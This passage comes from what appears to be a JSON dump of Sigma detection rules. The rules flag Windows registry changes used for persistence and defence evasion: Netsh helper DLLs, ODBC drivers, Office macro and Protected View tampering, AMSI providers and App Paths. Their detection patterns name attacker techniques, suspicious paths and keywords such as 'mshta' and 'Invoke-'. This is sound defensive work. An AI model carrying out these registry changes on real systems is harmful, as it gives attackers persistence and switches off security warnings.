    "content": "title: New Netsh Helper DLL Registered From A Suspicious Location\nid: e7b18879-676e-4a0e-ae18-27039185a8e7\nrelated:\n    - id: 56321594-9087-49d9-bf10-524fe8479452\n      type: similar\n    - id: c90362e0-2df3-4e61-94fe-b37615814cb1\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\nreferences:\n    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll\n    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-11-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.007\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_target:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\NetSh'\n    selection_folders_1:\n        Details|contains:\n            - ':\\Perflogs\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Temporary Internet'\n    selection_folders_2:\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favorites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Favourites\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Contacts\\'\n        - Details|contains|all:\n              - ':\\Users\\'\n              - '\\Pictures\\'\n    condition: selection_target and 1 of selection_folders_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml",
    "content": "title: Potential Persistence Via Netsh Helper DLL - Registry\nid: c90362e0-2df3-4e61-94fe-b37615814cb1\nrelated:\n    - id: 56321594-9087-49d9-bf10-524fe8479452\n      type: similar\n    - id: e7b18879-676e-4a0e-ae18-27039185a8e7\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper\nreferences:\n    - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll\n    - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/\nauthor: Anish Bogati\ndate: 2023-11-28\nmodified: 2025-10-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.007\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\NetSh'\n        Details|contains: '.dll'\n    filter_main_poqexec:\n        Image: 'C:\\Windows\\System32\\poqexec.exe'\n        Details:\n            - 'ipmontr.dll'\n            - 'iasmontr.dll'\n            - 'ippromon.dll'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate helper added by different programs and the OS\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml",
    "content": "title: New Application in AppCompat\nid: 60936b49-fca0-4f32-993d-7415edcf9a5d\nstatus: test\ndescription: A general detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/1\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2023-08-17\ntags:\n    - attack.execution\n    - attack.t1204.002\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: '\\AppCompatFlags\\Compatibility Assistant\\Store\\'\n    condition: selection\nfalsepositives:\n    - This rule is to explore new applications on an endpoint. False positives depend on the organization.\n    - Newly set up system.\n    - Legitimate installation of a new application.\nlevel: informational\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_new_network_provider.yml",
    "content": "title: Potential Credential Dumping Attempt Using New NetworkProvider - REG\nid: 0442defa-b4a2-41c9-ae2c-ea7042fc4701\nrelated:\n    - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77\n      type: similar\nstatus: test\ndescription: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it\nreferences:\n    - https://learn.microsoft.com/en-us/troubleshoot/windows-client/setup-upgrade-and-drivers/network-provider-settings-removed-in-place-upgrade\n    - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-23\nmodified: 2023-08-17\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\System\\CurrentControlSet\\Services\\'\n            - '\\NetworkProvider'\n    filter:\n        TargetObject|contains:\n            - '\\System\\CurrentControlSet\\Services\\WebClient\\NetworkProvider'\n            - '\\System\\CurrentControlSet\\Services\\LanmanWorkstation\\NetworkProvider'\n            - '\\System\\CurrentControlSet\\Services\\RDPNP\\NetworkProvider'\n            # - '\\System\\CurrentControlSet\\Services\\P9NP\\NetworkProvider' # Related to WSL; remove the comment if you use WSL in your environment\n    filter_valid_procs:\n        Image: C:\\Windows\\System32\\poqexec.exe\n    condition: selection and not 1 of filter*\nfalsepositives:\n    - Other legitimate network providers used and not filtered in this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered.yml",
    "content": "title: New ODBC Driver Registered\nid: 3390fbef-c98d-4bdd-a863-d65ed7c610dd\nstatus: test\ndescription: Detects the registration of a new ODBC driver.\nreferences:\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-23\nmodified: 2023-08-17\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\ODBC\\ODBCINST.INI\\'\n        TargetObject|endswith: '\\Driver'\n    filter_main_sqlserver:\n        TargetObject|contains: '\\SQL Server\\'\n        Details: '%WINDIR%\\System32\\SQLSRV32.dll'\n    filter_optional_office_access:\n        TargetObject|contains: '\\Microsoft Access '\n        Details|startswith: 'C:\\Progra'\n        Details|endswith: '\\ACEODBC.DLL'\n    filter_optional_office_excel:\n        TargetObject|contains: '\\Microsoft Excel Driver'\n        Details|startswith: 'C:\\Progra'\n        Details|endswith: '\\ACEODBC.DLL'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_odbc_driver_registered_susp.yml",
    "content": "title: Potentially Suspicious ODBC Driver Registered\nid: e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4\nstatus: test\ndescription: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location\nreferences:\n    - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-05-23\nmodified: 2023-08-17\ntags:\n    - attack.credential-access\n    - attack.persistence\n    - attack.t1003\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\ODBC\\ODBCINST.INI\\'\n        TargetObject|endswith:\n            - '\\Driver'\n            - '\\Setup'\n        Details|contains:\n            - ':\\PerfLogs\\'\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Users\\Public\\'\n            - ':\\Windows\\Registration\\CRMLog'\n            - ':\\Windows\\System32\\com\\dmp\\'\n            - ':\\Windows\\System32\\FxsTmp\\'\n            - ':\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\'\n            - ':\\Windows\\System32\\spool\\drivers\\color\\'\n            - ':\\Windows\\System32\\spool\\PRINTERS\\'\n            - ':\\Windows\\System32\\spool\\SERVERS\\'\n            - ':\\Windows\\System32\\Tasks_Migrated\\'\n            - ':\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\SysWOW64\\com\\dmp\\'\n            - ':\\Windows\\SysWOW64\\FxsTmp\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\'\n            - ':\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - ':\\Windows\\Tracing\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\AppData\\Roaming\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml",
    "content": "title: Trust Access Disable For VBApplications\nid: 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf\nrelated:\n    - id: 9b894e57-033f-46cf-b7fa-a52804181973\n      type: obsolete\nstatus: test\ndescription: Detects registry changes to Microsoft Office \"AccessVBOM\" to a value of \"1\" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\n    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nauthor: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Security\\AccessVBOM'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml",
    "content": "title: Microsoft Office Protected View Disabled\nid: a5c7a43f-6009-4a8c-80c5-32abf1c53ecc\nrelated:\n    - id: 7c637634-c95d-4bbf-b26c-a82510874b34\n      type: obsolete\nstatus: test\ndescription: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\n    - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/\n    - https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/\n    - https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-06-08\nmodified: 2023-08-17\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection_path:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Office\\'\n            - '\\Security\\ProtectedView\\'\n    selection_values_1:\n        Details: 'DWORD (0x00000001)'\n        TargetObject|endswith:\n            - '\\DisableAttachementsInPV' # Turn off Protected View for attachments opened from Outlook\n            - '\\DisableInternetFilesInPV' # Turn off Protected View for files downloaded from Internet zone\n            - '\\DisableIntranetCheck' # Turn off Protected View for file located in UNC paths\n            - '\\DisableUnsafeLocationsInPV' # Turn off Protected View for unsafe locations\n    selection_values_0:\n        Details: 'DWORD (0x00000000)'\n        TargetObject|endswith:\n            - '\\enabledatabasefileprotectedview'\n            - '\\enableforeigntextfileprotectedview'\n    condition: selection_path and 1 of selection_values_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_disable_python_security_warnings.yml",
    "content": "title: Python Function Execution Security Warning Disabled In Excel - Registry\nid: 17e53739-a1fc-4a62-b1b9-87711c2d5e44\nrelated:\n    - id: 023c654f-8f16-44d9-bb2b-00ff36a62af9\n      type: similar\nstatus: test\ndescription: |\n    Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\n    Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\nreferences:\n    - https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327\nauthor: Nasreddine Bencherchali (Nextron Systems), @Kostastsale\ndate: 2024-08-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Office\\'\n        TargetObject|endswith: '\\Excel\\Security\\PythonFunctionWarnings'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_enable_dde.yml",
    "content": "title: Enable Microsoft Dynamic Data Exchange\nid: 63647769-326d-4dde-a419-b925cc0caf42\nstatus: test\ndescription: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/ADV170021\nauthor: frack113\ndate: 2022-02-26\nmodified: 2023-08-17\ntags:\n    - attack.execution\n    - attack.t1559.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_word:\n        TargetObject|endswith: '\\Word\\Security\\AllowDDE'\n        Details:\n            - 'DWORD (0x00000001)'\n            - 'DWORD (0x00000002)'\n    selection_excel:\n        TargetObject|endswith:\n            - '\\Excel\\Security\\DisableDDEServerLaunch'\n            - '\\Excel\\Security\\DisableDDEServerLookup'\n        Details: 'DWORD (0x00000000)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml",
    "content": "title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting\nid: 396ae3eb-4174-4b9b-880e-dc0364d78a19\nstatus: test\ndescription: Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\n    - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-04-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Outlook\\LoadMacroProviderOnBoot'\n        Details|contains: '0x00000001'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml",
    "content": "title: Outlook Macro Execution Without Warning Setting Enabled\nid: e3b50fa5-3c3f-444e-937b-0a99d33731cd\nstatus: test\ndescription: Detects the modification of Outlook security setting to allow unprompted execution of macros.\nreferences:\n    - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\nauthor: '@ScoubiMtl'\ndate: 2021-04-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.command-and-control\n    - attack.t1137\n    - attack.t1008\n    - attack.t1546\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Outlook\\Security\\Level'\n        Details|contains: '0x00000001' # Enable all Macros\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml",
    "content": "title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry\nid: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08\nrelated:\n    - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a\n      type: similar\n    - id: 55f0a3a1-846e-40eb-8273-677371b8d912 # ProcCreation variation\n      type: similar\nstatus: test\ndescription: Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros\nreferences:\n    - https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048\n    - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-02-08\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Outlook\\Security\\EnableUnsafeClientMailRules'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_outlook_security_settings.yml",
    "content": "title: Outlook Security Settings Updated - Registry\nid: c3cefdf4-6703-4e1c-bad8-bf422fc5015a\nrelated:\n    - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # EnableUnsafeClientMailRules\n      type: similar\nstatus: test\ndescription: Detects changes to the registry values related to outlook security settings\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md\n    - https://learn.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings\nauthor: frack113\ndate: 2021-12-28\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains|all:\n            - '\\SOFTWARE\\Microsoft\\Office\\'\n            - '\\Outlook\\Security\\'\n    condition: selection\nfalsepositives:\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_trust_record_susp_location.yml",
    "content": "title: Macro Enabled In A Potentially Suspicious Document\nid: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd\nrelated:\n    - id: 295a59c1-7b79-4b47-a930-df12c15fc9c2\n      type: derived\nstatus: test\ndescription: Detects registry changes to Office trust records where the path is located in a potentially suspicious location\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_value:\n        TargetObject|contains: '\\Security\\Trusted Documents\\TrustRecords'\n    selection_paths:\n        TargetObject|contains:\n            # Note: add more locations where you don't expect a user to execute macro-enabled docs\n            - '/AppData/Local/Microsoft/Windows/INetCache/'\n            - '/AppData/Local/Temp/'\n            - '/PerfLogs/'\n            - 'C:/Users/Public/'\n            - 'file:///D:/'\n            - 'file:///E:/'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_trusted_location_uncommon.yml",
    "content": "title: Uncommon Microsoft Office Trusted Location Added\nid: f742bde7-9528-42e5-bd82-84f51a8387d2\nrelated:\n    - id: a0bed973-45fa-4625-adb5-6ecdf9be70ac\n      type: derived\nstatus: test\ndescription: Detects changes to registry keys related to \"Trusted Location\" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions.\nreferences:\n    - Internal Research\n    - https://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-06-21\nmodified: 2023-09-29\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: 'Security\\Trusted Locations\\Location'\n        TargetObject|endswith: '\\Path'\n    filter_exclude_known_paths:\n        Details|contains:\n            - '%APPDATA%\\Microsoft\\Templates'\n            - '%%APPDATA%%\\Microsoft\\Templates'\n            - '%APPDATA%\\Microsoft\\Word\\Startup'\n            - '%%APPDATA%%\\Microsoft\\Word\\Startup'\n            - ':\\Program Files (x86)\\Microsoft Office\\root\\Templates\\'\n            - ':\\Program Files\\Microsoft Office (x86)\\Templates'\n            - ':\\Program Files\\Microsoft Office\\root\\Templates\\'\n            - ':\\Program Files\\Microsoft Office\\Templates\\'\n    filter_main_office_click_to_run:\n        Image|contains: ':\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\'\n        Image|endswith: '\\OfficeClickToRun.exe'\n    filter_main_office_apps:\n        Image|contains:\n            - ':\\Program Files\\Microsoft Office\\'\n            - ':\\Program Files (x86)\\Microsoft Office\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_exclude_*\nfalsepositives:\n    - Other unknown legitimate or custom paths need to be filtered to avoid false positives\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_office_vba_warnings_tamper.yml",
    "content": "title: Office Macros Warning Disabled\nid: 91239011-fe3c-4b54-9f24-15c86bb65913\nrelated:\n    - id: 9b894e57-033f-46cf-b7fa-a52804181973\n      type: obsolete\nstatus: test\ndescription: Detects registry changes to Microsoft Office \"VBAWarning\" to a value of \"1\" which enables the execution of all macros, whether signed or unsigned.\nreferences:\n    - https://twitter.com/inversecos/status/1494174785621819397\n    - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/\n    - https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nauthor: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-22\nmodified: 2024-03-19\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Security\\VBAWarnings'\n        Details: 'DWORD (0x00000001)'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_optimize_file_sharing_network.yml",
    "content": "title: MaxMpxCt Registry Value Changed\nid: 0e6a9e62-627e-496c-aef5-bfa39da29b5e\nstatus: test\ndescription: |\n    Detects changes to the \"MaxMpxCt\" registry value.\n    MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.\n    Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.\nreferences:\n    - https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps\n    - https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware\n    - https://www.intrinsec.com/alphv-ransomware-gang-analysis/?cn-reloaded=1\n    - https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-19\ntags:\n    - attack.defense-evasion\n    - attack.t1070.005\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Services\\LanmanServer\\Parameters\\MaxMpxCt'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_amsi_providers.yml",
    "content": "title: Potential Persistence Via New AMSI Providers - Registry\nid: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705\nstatus: test\ndescription: |\n    Detects when an attacker adds a new AMSI provider via the Windows Registry to bypass AMSI (Antimalware Scan Interface) protections.\n    Attackers may add custom AMSI providers to persist on the system and evade detection by security software that relies on AMSI for scanning scripts and other content.\n    This technique is often used in conjunction with fileless malware and script-based attacks to maintain persistence while avoiding detection.\nreferences:\n    - https://persistence-info.github.io/Data/amsi.html\n    - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-21\nmodified: 2025-10-26\ntags:\n    - attack.persistence\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains:\n            - '\\SOFTWARE\\Microsoft\\AMSI\\Providers\\'\n            - '\\SOFTWARE\\WOW6432Node\\Microsoft\\AMSI\\Providers\\'\n    filter_optional_avast:\n        Image:\n            - 'C:\\Program Files\\Avast Software\\Avast\\RegSvr.exe'\n            - 'C:\\Program Files\\Avast Software\\Avast\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'\n    filter_optional_avg:\n        Image:\n            - 'C:\\Program Files\\AVG\\Antivirus\\RegSvr.exe'\n            - 'C:\\Program Files\\AVG\\Antivirus\\x86\\RegSvr.exe'\n        TargetObject|contains: '\\{FB904E4E-D2C7-4C8D-8492-B620BB9896B1}'\n    filter_optional_avira:\n        Image: 'C:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n        TargetObject|contains: '\\{00000001-3DCC-4B48-A82E-E2071FE58E05}'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate security products adding their own AMSI providers. Filter these according to your environment.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml",
    "content": "title: Potential Persistence Via AppCompat RegisterAppRestart Layer\nid: b86852fb-4c77-48f9-8519-eb1b2c308b59\nstatus: test\ndescription: |\n    Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.\n    This compatibility layer allows an application to register for restart using the \"RegisterApplicationRestart\" API.\n    This can be potentially abused as a persistence mechanism.\nreferences:\n    - https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.011\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers\\'\n        Details|contains: 'REGISTERAPPRESTART'\n    condition: selection\nfalsepositives:\n    - Legitimate applications making use of this feature for compatibility reasons\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_app_paths.yml",
    "content": "title: Potential Persistence Via App Paths Default Property\nid: 707e097c-e20f-4f67-8807-1f72ff4500d6\nstatus: test\ndescription: |\n    Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry, which might be used as a method of persistence.\n    The entries found under App Paths are used primarily for the following purposes.\n    First, to map an application's executable file name to that file's fully qualified path.\n    Second, to prepend information to the PATH environment variable on a per-application, per-process basis.\nreferences:\n    - https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n    - https://learn.microsoft.com/en-us/windows/win32/shell/app-registration\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-10\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.012\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths'\n        TargetObject|endswith:\n            - '(Default)'\n            - 'Path'\n        Details|contains:\n            # Add more suspicious paths or binaries as you see fit.\n            - '\\Users\\Public'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Windows\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '%temp%'\n            - '%tmp%'\n            - 'iex'\n            - 'Invoke-'\n            - 'rundll32'\n            - 'regsvr32'\n            - 'mshta'\n            - 'cscript'\n            - 'wscript'\n            - '.bat'\n            - '.hta'\n            - '.dll'\n            - '.ps1'\n    condition: selection\nfalsepositives:\n    - Legitimate applications registering their binary from one of the suspicious locations mentioned above (tune it)\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml",
    "content": "title: Potential Persistence Using DebugPath\nid: df4dc653-1029-47ba-8231-3c44238cc0ae\nstatus: test\ndescription: Detects potential persistence using Appx DebugPath\nreferences:\n    - https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/\n    - https://github.com/rootm0s/WinPwnage\nauthor: frack113\ndate: 2022-07-27\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_debug:\n        TargetObject|contains: 'Classes\\ActivatableClasses\\Package\\Microsoft.'\n        TargetObject|endswith: '\\DebugPath'\n    selection_default:\n        TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\PackagedAppXDebug\\Microsoft.'\n        TargetObject|endswith: '\\(Default)'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
